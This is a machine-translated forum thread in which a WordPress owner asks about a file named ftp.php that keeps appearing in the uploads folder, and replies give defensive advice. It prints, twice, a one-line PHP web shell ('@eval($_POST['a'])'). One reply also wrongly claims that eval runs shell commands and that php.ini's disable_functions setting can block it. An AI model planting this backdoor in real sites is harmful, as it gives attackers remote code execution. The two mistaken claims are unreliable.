看起来好像我的几个wordpress网站一直被黑客攻击。我安装了WordFence并更改了密码等。但是一个名为http://ftp.php的文件一直被上传到我的"uploads"文件夹。
包含以下内容:
<?php
echo '123.txt';
?>
<?php @eval($_POST['a']);?>
这是做什么的?你知道怎么处理这个吗?除了这个文件,我在博客上没有遇到任何其他问题。
只是一点建议来帮助你开始,如果他已经访问了你的服务器,你需要做的不仅仅是修补他利用的原始安全漏洞。
1]你需要确定他如何上传他的文件,并阻止他这样做。如果您的网站上有一个表单没有验证数据(通过使用sanitize_key()或类似的方法),那么他很可能以这种方式注入他的代码。确保你网站上的所有用户输入都被清理干净,仔细检查所有东西,插件,你自己的代码,等等。
2]他是否获得了服务器级别的访问权限?他仅仅是访问了你的Wordpress后端吗?如果他有FTP或类似的访问你的网站,我的意思是曾经入侵并拥有它,你需要确保他没有设置某种后门。当你说你已经更改了登录名,而他仍然设法重新上传了他的文件时,这表明有后门。如果这不是后门,那他只是重新利用了他第一次访问时使用的安全漏洞。检查整个服务器,以确保他没有在某个地方插入一个允许他重新执行代码的非法PHP文件,这将是一个非常好的主意。如果你有一个在他获得访问权限之前的服务器文件的干净备份,清除你的服务器并重新上传干净的副本。为了保持领先一步,你需要为他收拾烂摊子。
3]确定他利用的漏洞来访问您的网站。如果您在网站上的所有用户输入都经过了处理,并且您确信他没有设置后门,那么您需要开始记录所有内容,并在再次发生这种情况时检查日志。如果你不能阻止他访问服务器,你需要抓住他这样做,这样你就可以更好地了解他访问了什么以及他是如何访问的。据你所知,这家伙现在可能有shell访问权限,甚至不再通过FTP或Wordpress登录。你真的需要尽职调查,找出你的漏洞在哪。然后修补它们。
4]现实一点,谦虚一点。如果您发现他已经渗透得太深,您的经验无法处理,请与您的托管提供商交谈,并告诉他们情况。向他们寻求帮助是可以的,这就是他们的作用。相信我,他们最不想看到的就是黑客在他们宝贵的服务器周围乱翻。他们可能已经有了他访问服务器的记录,甚至可能能帮你得到他的IP地址。至少,如果他在服务器级别访问您的站点,他们应该能够帮助您阻止他。
5]如果你设法把他弄出来,你需要确保你已经堵住了Wordpress安装中的所有漏洞。所有的数据都需要清理,确保服务器上没有恶意文件,尽可能少地使用插件(它们为你还不知道的安全漏洞提供了更多机会),并确保你有不容易被暴力破解的强密码。尽可能地记录所有事情也是一个好主意,这样当类似的事情发生时,你就有东西可以参考了。你越让他难以访问你的服务器,他就越有可能转向更容易的目标。对黑客最好的进攻就是好的防御。
你可能会发现这篇文章来自Wordpress Codex信息丰富:http://codex.wordpress.org/Hardening_WordPress
6]备份你的文件和数据库。现在。处理完所有这些之后,最好备份服务器上的所有内容(如果还没有备份的话)。你需要意识到这个黑客可能是一个彻头彻尾的混蛋,只是删除了所有的东西。一旦你知道你的文件是干净的,你的服务器没有黑客攻击,备份…所有的东西。同时备份您的数据库。您应该至少每周做一次,这取决于您更新站点的频率,并将备份存储在不同的服务器上。如果您真的想要聪明一点,请在本地机器上做第三个备份。越多越好,因为你不想发现自己处于不得不从头开始的境地,因为黑客决定删除你所有的文件。
祝你好运,如果你有任何更新,请告诉我们。我们也许能给你更具体、更好的建议。"eval"是个邪恶的函数!该函数使在服务器上执行命令成为可能。
该命令来自$_POST['a'] .
下面的例子:一个黑客写了一个基于HTML的公式,有一个简单的文本框和一个提交按钮。文本框的内容(在本例中为$_POST['a'])将被发送到您的PHP文件。
PHP文件见:
<?php @eval($_POST['a']);?>
这是执行命令的函数。$_POST['a']的内容可以是ls -la来接收电流;文件结构-一个简单的Linux命令。
参见http://php.net/manual/en/function.eval.php。
你如何防止这个功能?
对于这个邪恶的函数,在php.ini中使用disable_function指示!http://php.net/manual/en/ini.core.php ini.disable-functions